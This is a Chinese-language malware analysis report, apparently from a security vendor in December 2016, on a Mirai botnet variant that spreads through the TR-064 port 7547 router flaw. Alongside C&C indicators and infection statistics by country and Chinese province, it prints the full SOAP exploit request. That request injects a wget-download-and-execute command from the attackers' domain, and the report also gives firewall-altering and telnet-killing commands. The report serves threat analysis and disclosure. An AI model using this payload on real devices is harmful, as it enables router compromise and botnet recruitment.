安天追影小组分析Mirai变种新传播方式
时间 : 2016年12月19日 来源: 安天
安天联合电信云堤发布针对Mirai新变种威胁分析报告,利用捕风蜜罐捕获到Mirai新变种,该变种采用最近公布的7547端口漏洞,并对公布漏洞的payload进行了修改使之可以下载执行Mirai。通过互联网流量监控发现了大量IoT设备进行7547端口扫描,这些设备已经被新Mirai变种攻陷,目前监测到超过30万IoT设备感染。
近期披露的D1000TR064 服务器 TCP 端口 7547漏洞,通过发送某些 TR 064 命令,可以指示运行该服务的设备打开防火墙上的 80端口。允许从互联网访问设备的web 管理界面。D1000 的默认登录密码是默认 Wi-fi 密码,也可以通过另一个TR064指令获取。该漏洞关键代码是向端口7547发送TR 064命令,设置新NTP服务器的方式,在NewNTPServer1中采用指令iptables -IINPUT -p tcp --dport 80 -j ACCEPT解除防火墙对80访问限制。以下是重要的代码片段:
Mirai变种的C&C配置加密方式与源码泄露的家族没有变化。连接C&C服务器timeserver.host(5.8.65.138)的23端口,上线包数据为0x00000001。
在被感染的路由器执行以下命令:
busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP busybox killall -9 telnetd |
第一个命令是关闭7547端口,是为了避免重复感染,也使其他攻击者不能再利用这个漏洞;第二个命令是停止telnet服务,使用户无法远程更新固件。然后,生成随机IP,对这些IP的7547端口进行扫描与漏洞入侵。样本利用7547漏洞进行了相应的改造,使攻击直接下载远程样本,修改可执行模式并且运行。该样本中包含三个远程样本URL,分别为:http://l.ocalhost.host/1、http:// l.ocalhost.host/2、http:// l.ocalhost.host/3。
攻击代码POST数据如下:
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/3;chmod 777 3;./3`</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
该放马域名l.ocalhost.host是黑客利用漏洞快速传播Mirai变种之前新注册2016年11月26日解析的IP包括两个:
2016-11-28 5.8.65.140
2016-11-27 188.209.49.60
通过电信云堤抽样流量分析获得如下信息:
-
确认被感染具有7547扫描能力的节点主要通过包括扫描节点自身是IoT设备,扫描节点多次使用相同端口扫描,扫描节点发出攻击漏洞方法进行发现。
-
确认感染设备总数:306778
-
感染设备主要开放服务或设备信息包括RomPager/4.07、DVRDVS、TR069 Connect Request Server、DHT Nodes、HuaweiHomeGateway。
目前发现感染的主要节点分布地区 (列表)
地区 | 感染设备总数 |
巴西 | 107166 |
英国 | 61854 |
爱尔兰 | 18268 |
拉美其它地区 | 17210 |
土耳其 | 13863 |
伊朗 | 11573 |
澳大利亚 | 8002 |
泰国 | 7159 |
意大利 | 6243 |
芬兰 | 5294 |
智利 | 4937 |
阿根廷 | 3659 |
中国 | 3321 |
法国 | 2160 |
巴基斯坦 | 2095 |
其它北美地区(非美国) | 1916 |
希腊 | 1712 |
罗马尼亚 | 1485 |
印度 | 1197 |
西班牙 | 1187 |
越南 | 761 |
俄罗斯 | 599 |
德国 | 529 |
美国 | 488 |
马来西亚 | 471 |
其它欧洲和中东地区 | 367 |
瑞典 | 352 |
玻利维亚 | 341 |
格鲁吉亚 | 341 |
其它欧洲地区 | 260 |
新西兰 | 224 |
塞尔维亚 | 169 |
捷克 | 140 |
南非 | 108 |
其它亚太地区 | 102 |
瑞士 | 98 |
哥伦比亚 | 91 |
阿尔巴尼亚 | 87 |
其它非洲地区 | 79 |
马达加斯加 | 75 |
摩洛哥 | 72 |
丹麦 | 69 |
波斯尼亚和黑塞哥维那 | 67 |
洪都拉斯 | 67 |
秘鲁 | 64 |
埃及 | 43 |
爱沙尼亚 | 33 |
日本 | 31 |
阿塞拜疆 | 30 |
波兰 | 27 |
圣马力诺 | 26 |
斯洛伐克 | 15 |
印度尼西亚 | 13 |
立陶宛 | 11 |
利比亚 | 11 |
阿曼 | 10 |
韩国 | 10 |
科威特 | 10 |
阿联酋 | 9 |
葡萄牙 | 9 |
奥地利 | 7 |
菲律宾 | 7 |
荷兰 | 7 |
乌克兰 | 7 |
叙利亚 | 6 |
阿尔及利亚 | 5 |
巴拉圭 | 5 |
塞内加尔 | 5 |
也门 | 5 |
巴勒斯坦 | 4 |
巴林 | 4 |
冈比亚 | 4 |
加拿大 | 4 |
卢森堡 | 4 |
马尔代夫 | 4 |
萨尔瓦多 | 4 |
伊拉克 | 4 |
比利时 | 3 |
哈萨克斯坦 | 3 |
拉脱维亚 | 3 |
新加坡 | 3 |
新喀里多尼亚 | 3 |
冰岛 | 2 |
科特迪瓦 | 2 |
黎巴嫩 | 2 |
挪威 | 2 |
沙特阿拉伯 | 2 |
坦桑尼亚 | 2 |
以色列 | 2 |
多米尼加 | 1 |
佛得角 | 1 |
黑山 | 1 |
加蓬 | 1 |
老挝 | 1 |
孟加拉 | 1 |
摩尔多瓦 | 1 |
莫桑比克 | 1 |
尼泊尔 | 1 |
尼日利亚 | 1 |
所罗门群岛 | 1 |
委内瑞拉 | 1 |
乌兹别克斯坦 | 1 |
亚美尼亚 | 1 |
国内部分感染节点分布图:
注:本图由电信云堤提供
国内感染节点分布表
省份 | 感染设备总数 |
广东省 | 508 |
江苏省 | 345 |
浙江省 | 240 |
福建省 | 219 |
湖北省 | 186 |
上海市 | 182 |
山东省 | 176 |
湖南省 | 148 |
四川省 | 131 |
河南省 | 107 |
北京市 | 94 |
广西省 | 93 |
安徽省 | 92 |
河北省 | 89 |
云南省 | 78 |
辽宁省 | 77 |
陕西省 | 62 |
天津市 | 56 |
江西省 | 55 |
山西省 | 55 |
贵州省 | 51 |
重庆市 | 51 |
吉林省 | 40 |
黑龙江省 | 38 |
甘肃省 | 31 |
香港 | 17 |
海南省 | 17 |
台湾 | 11 |
西藏自治区 | 5 |
宁夏回族自治区 | 4 |
青海省 | 2 |
澳门 | 尚未发现 |
参考文献链接:
[1]. http://www.vfocus.net/art/20161109/13085.html
[2]. https://www.broadband-forum.org/technical/download/TR-064.pdf
注:
本分析报告由安天追影小组与电信云堤联合发布,如您认为对网络安全有价值,请转载时注明,并附上链接。
本分析报告错漏缺点在所难免,敬请业内专家和研究者回帖指点批评指正。